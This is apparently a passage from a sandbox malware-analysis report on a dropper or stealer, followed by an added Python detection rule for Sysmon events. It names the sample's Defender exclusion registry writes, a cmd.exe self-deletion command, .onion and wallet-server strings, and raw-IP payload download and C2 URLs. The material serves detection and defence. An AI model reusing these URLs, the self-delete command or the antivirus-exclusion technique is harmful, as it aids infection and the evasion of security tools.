                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{3FAACE9B-0B9D-4D37-90B5-C9D5F39DABA7}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe Code function: 4_2_0041D9E1 FindFirstFileExA,4_2_0041D9E1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe Code function: 11_2_0041D9E1 FindFirstFileExA,11_2_0041D9E1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe Code function: 11_2_05BCDC48 FindFirstFileExA,11_2_05BCDC48
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe Code function: 19_2_0041D9E1 FindFirstFileExA,19_2_0041D9E1
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe Code function: 19_2_05CFDC48 FindFirstFileExA,19_2_05CFDC48
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe Code function: 21_2_0041D9E1 FindFirstFileExA,21_2_0041D9E1
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe Code function: 21_2_041DDC48 FindFirstFileExA,21_2_041DDC48
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe File opened: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe File opened: C:\Users\user\AppData\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe File opened: C:\Users\user\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe File opened: C:\Users\user\AppData\Local\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe File opened: C:\Users\user\AppData\Local\Temp\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe File opened: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe
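The Defender exclusion writes in this section land under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{GUID}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions, which is the local Group Policy editor's staging area rather than the live policy key; a Machine-side setting written there surfaces under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender once policy is applied, so a detection that only watches the HKLM policy key misses the write the sample actually makes. The Python below is an added example for this report, not Joe Sandbox output or code from the sample: it normalizes Sysmon-style registry events, resolves staged GPO paths to the effective policy key, flags Defender exclusion writes, and also flags the cmd.exe /c timeout /t 5 & del /f /q "..." & del "C:\ProgramData\*.dll" self-deletion command that appears among the decrypted strings earlier on this page. The events are constructed from the report lines above (SIDs, the cmd.exe parent path and the benign events are placeholders); the resolution of {GUID}Machine to HKLM is this example's assumption about how the staged write takes effect, and the field names follow Sysmon's naming rather than anything in this report.

```python
"""Host-telemetry detections for two behaviours in this report: Defender exclusion
writes staged through the local Group Policy editor, and the cmd.exe self-delete.

Added example, not Joe Sandbox output or code from the sample. Events are
constructed in Sysmon's field naming; the {GUID}Machine -> HKLM resolution is
this example's assumption about how a staged policy write takes effect.
"""
import re

HIVE_ALIASES = (("HKEY_CURRENT_USER\\", "HKCU\\"), ("HKEY_LOCAL_MACHINE\\", "HKLM\\"))

# Staging area the local GPO editor writes to before the settings are saved to Registry.pol.
GPO_STAGING_RE = re.compile(
    r"^(?:HKCU|HKLM)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy Objects\\"
    r"\{[0-9A-Fa-f-]{36}\}(?P<side>Machine|User)\\(?P<rest>.+)$", re.I)
# Defender exclusion keys: the policy key (what the staged write populates) and the product key.
DEFENDER_EXCLUSION_RE = re.compile(
    r"^HKLM\\SOFTWARE\\(?:Policies\\)?Microsoft\\Windows Defender\\Exclusions(?:\\|$)", re.I)
# cmd.exe /c timeout /t N & del /f /q "<path>" ... as seen among the decrypted strings.
SELF_DELETE_RE = re.compile(
    r'cmd(?:\.exe)?"?\s+/c\s+timeout\s+/t\s+\d+\s*&\s*del\s+/f\s+/q\s+"(?P<target>[^"]+)"', re.I)
PROGRAMDATA_SWEEP = r'del "C:\ProgramData\*.dll"'


def normalize_key(path: str) -> str:
    """Map HKEY_* long names and Sysmon's HKU\\<SID> form onto HKCU/HKLM."""
    for long, short in HIVE_ALIASES:
        if path.upper().startswith(long):
            return short + path[len(long):]
    m = re.match(r"^HKU\\S-1-5-21-[\d-]+\\", path, re.I)
    if m:
        return "HKCU\\" + path[m.end():]
    return path


def effective_key(path: str) -> tuple:
    """Resolve a GPO staging path to the policy key it will populate; returns (key, was_staged)."""
    path = normalize_key(path)
    m = GPO_STAGING_RE.match(path)
    if m is None:
        return path, False
    root = "HKLM" if m.group("side").lower() == "machine" else "HKCU"
    return f"{root}\\{m.group('rest')}", True


def analyse(events: list) -> list:
    """Run both rules over Sysmon-style events (13 = RegistryEvent value set, 1 = ProcessCreate)."""
    findings = []
    for ev in events:
        if ev["event_id"] == 13:
            key, staged = effective_key(ev["target_object"])
            if DEFENDER_EXCLUSION_RE.match(key):
                findings.append({"rule": "defender_exclusion_policy_write", "image": ev["image"],
                                 "effective_key": key, "via_gpo_staging": staged})
        elif ev["event_id"] == 1:
            m = SELF_DELETE_RE.search(ev["command_line"])
            if m:
                findings.append({"rule": "cmd_timeout_self_delete", "image": ev["image"],
                                 "parent_image": ev.get("parent_image"),
                                 "deleted_path": m.group("target"),
                                 "sweeps_programdata_dlls":
                                     PROGRAMDATA_SWEEP.lower() in ev["command_line"].lower()})
    return findings


SAMPLE_EVENTS = [  # constructed from the report lines above; SIDs and the parent path are placeholders
    {"event_id": 13, "image": r"C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe",
     "target_object": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects"
                      r"\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft"
                      r"\Windows Defender\Exclusions\Exclusions_Extensions"},
    {"event_id": 13, "image": r"C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe",
     "target_object": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\SOFTWARE\Microsoft\Windows"
                      r"\CurrentVersion\Group Policy Objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine"
                      r"\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe"},
    {"event_id": 13, "image": r"C:\Windows\explorer.exe",       # benign: must not fire
     "target_object": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
    {"event_id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\user\AppData\Local\Temp\sample_stealer.exe",
     "command_line": r'"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q '
                     r'"C:\Users\user\AppData\Local\Temp\sample_stealer.exe" & del "C:\ProgramData\*.dll"" & exit'},
    {"event_id": 1, "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\system32\cmd.exe" /c dir /b C:\Users'},   # benign: must not fire
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding)
```

The staged write is the point to alert on: by the time the exclusion reaches HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions, Defender is already ignoring .exe files, and the value that got there was written by an unprivileged user-hive operation that many rule sets do not watch.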

                        Networking

                        Source: Malware configuration extractor URLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: OVzuyLkGPqt0m8hgNA0UwSGi.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: MG5MpTL6PRxqs920w9IrKJko.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: S0j14drhBOZGdsEYt1IovCSw.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: 5u7SB52PiwyXmzPmIXkMxPnZ.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: wgX5ZSzR0AzMXHqanPag1gRj.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: iAPF4MKQOxaJ8L9hAx7lvOHo.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: deCnBzZpp4FSC4HClFNfim7T.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: q4ApAlF0htaDXDwpRuZbSs2D.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: sih6EQ3BvpoPxj5e02CfNWP2.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: kRFsXXLVSoPNsmIBFOClxrFF.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: ZHH3BNVA85IlSTeCpiV3Sgqb.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: yREZhEa2ap6ZrOOJ0dooObNn.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: A7Npgp1C644Vm1weiCOIngpF.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: LnpGonVmQMt0HGAJRWXt8CZk.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: fOd8yCx7heVUBotMVvn44Lkb.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: CTyBq7xXhWynL963jluoRo4q.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: 3byEz2syG9SedsHKOY8fjUva.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: INMby6bIteiPvZFBRf5MhptY.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: tse6OoEOj17quPLpMuzuQXuv.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: HPgOzBdOCsD6vN5fCp1Y0Y3P.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: wsXaFUksxPKBrRgSF8fdC4UJ.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: EuHyDssPP1nHlUuAX6xe7qHq.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: wAM2iVsYnasUH1XcQbAuEKO9.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: N3D3oWQLfg7NjRxQawhp2xIb.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: ymBV9PkPmsW6KLoPxnFlPP0z.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: 8iDMf15n1CQluRX22T9R9HtN.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: DNg5zB00z0ICTiOXsQq9DsCv.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: nCCWNGZR7QSL7YK34Xz98mnq.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: ukkppf7mf9IddXdKqN6kNkCJ.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: 2OefjtQaIUwmUU1DhudbapTO.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: iDLONIGJibQO1rqOKEJT8AYO.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: UCtmeOC2UHPIofYPbbfGVnal.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: FwFq2CwBYW7qN3JbE79MHY4Z.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: tGiGhkaVGjaUagcI8QYmh6fh.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: e1O1AS1wlBZ3lHR2WsdujqoS.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: kkscE0U22us2Ek0MCP4ULYeK.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: O6RtFEDLFiXwylenzKOH7OwY.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: qYfRayRyiLshGUXCOWUSZUEQ.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: SzeKmiZzCnF5yGTNutlHXxk9.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: MDU18mQfPfwBDyDbk7CN3cwx.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: tM9DijOJq3CQOn3hcO2NIvuX.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: 5O2KNFG7blvHjvUDwarAfNHb.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: wW4vGceNlpE9ACIAc69a33Yc.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: jqRWDGKFMtlcJKUGe2uvqxuP.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: 3G30xcq8tfWItduGYVyT9CxK.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: O85XP7ZryV2biCD7WlxJwLlh.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: RnLGWQq0a888ySvUu4yqkuTs.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: IoXU8aP1TtCLwW6SykMr9y3D.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: fUzbEYrAlNz7Rv11K6EiLt1x.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: lylTQvkvcBwpzWzbHg6So2Er.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: UK8ipx6lqPw4aE70mcGL0JtJ.exe.3.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: R7XM8tWXgAp1wQYVEs65Btkd.exe.3.dr
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe File created: ZJJS5bo63td4EjeR2XP_7oEx.exe.5.dr
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe File created: qsEUVigKfPVLrm9GWTo8ucsA.exe.5.dr
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe File created: 7vjGPpkhw2aAaC2CnZlC02OG.exe.5.dr
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
                        Source: Yara matchFile source: 0.2.file.exe.27f3a5774e8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.27f39cfde18.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_00426504 __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,4_2_00426504
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.135/ohhelly
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.135/ohhellyOW
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.135/ohhellyPJ
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.135/ohhellyxe
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.203/dl.php
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.203/dl.php0/
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exe
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exe3W
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage12.php
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage12.phpAV
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447491375.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445863210.0000000002AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage12.phpI
